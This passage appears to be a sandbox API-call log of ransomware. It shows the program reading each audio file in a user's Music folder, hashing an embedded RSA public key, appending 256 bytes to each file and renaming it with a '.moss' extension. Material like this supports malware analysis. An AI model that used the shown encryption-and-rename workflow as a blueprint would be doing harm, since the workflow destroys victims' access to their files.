HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\5RpvrOU_FL1tbaCm.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\5rpvrou_fl1tbacm.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\5RpvrOU_FL1tbaCm.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\5rpvrou_fl1tbacm.mp3.moss")) returned 1 [0172.388] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.388] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.388] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.389] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.389] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x966ec650, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0xc233fd80, ftLastAccessTime.dwHighDateTime=0x1d5e2db, ftLastWriteTime.dwLowDateTime=0xc233fd80, ftLastWriteTime.dwHighDateTime=0x1d5e2db, nFileSizeHigh=0x0, nFileSizeLow=0x17c35, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S5s3cW4oAyK.m4a", cAlternateFileName="S5S3CW~1.M4A")) returned 1 [0172.389] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\S5s3cW4oAyK.m4a") returned=".m4a" [0172.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\S5s3cW4oAyK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\s5s3cw4oayk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.389] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=97333) returned 1 [0172.389] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.392] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x17c0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.393] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.393] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x17c35, lpOverlapped=0x0) returned 1 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.394] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.395] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.395] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.395] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.396] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.396] GetLastError () returned 0x0 [0172.396] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.396] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.396] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.396] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.396] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.396] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.396] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.396] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.397] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x17c35, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.397] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.397] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.397] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\S5s3cW4oAyK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\s5s3cw4oayk.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\S5s3cW4oAyK.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\s5s3cw4oayk.m4a.moss")) returned 1 [0172.398] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.398] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.398] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.400] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.400] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a1e180, ftCreationTime.dwHighDateTime=0x1d5db5d, ftLastAccessTime.dwLowDateTime=0xf63cd310, ftLastAccessTime.dwHighDateTime=0x1d5d8b1, ftLastWriteTime.dwLowDateTime=0xf63cd310, ftLastWriteTime.dwHighDateTime=0x1d5d8b1, nFileSizeHigh=0x0, nFileSizeLow=0x37bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wcmZd NU.m4a", cAlternateFileName="WCMZDN~1.M4A")) returned 1 [0172.400] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\wcmZd NU.m4a") returned=".m4a" [0172.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\wcmZd NU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\wcmzd nu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.400] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=14267) returned 1 [0172.400] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.403] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3795, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.403] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.404] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x37bb, lpOverlapped=0x0) returned 1 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.404] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.406] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.406] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.406] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.406] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.406] GetLastError () returned 0x0 [0172.406] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.406] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.406] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.406] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.406] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.406] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.407] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x37bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.407] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.407] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\wcmZd NU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\wcmzd nu.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\wcmZd NU.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\wcmzd nu.m4a.moss")) returned 1 [0172.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.408] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.409] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a1e180, ftCreationTime.dwHighDateTime=0x1d5db5d, ftLastAccessTime.dwLowDateTime=0xf63cd310, ftLastAccessTime.dwHighDateTime=0x1d5d8b1, ftLastWriteTime.dwLowDateTime=0xf63cd310, ftLastWriteTime.dwHighDateTime=0x1d5d8b1, nFileSizeHigh=0x0, nFileSizeLow=0x37bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wcmZd NU.m4a", cAlternateFileName="WCMZDN~1.M4A")) returned 0 [0172.409] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46128 | out: hHeap=0xcd0000) returned 1 [0172.409] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0172.409] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.409] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.409] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.411] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.411] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 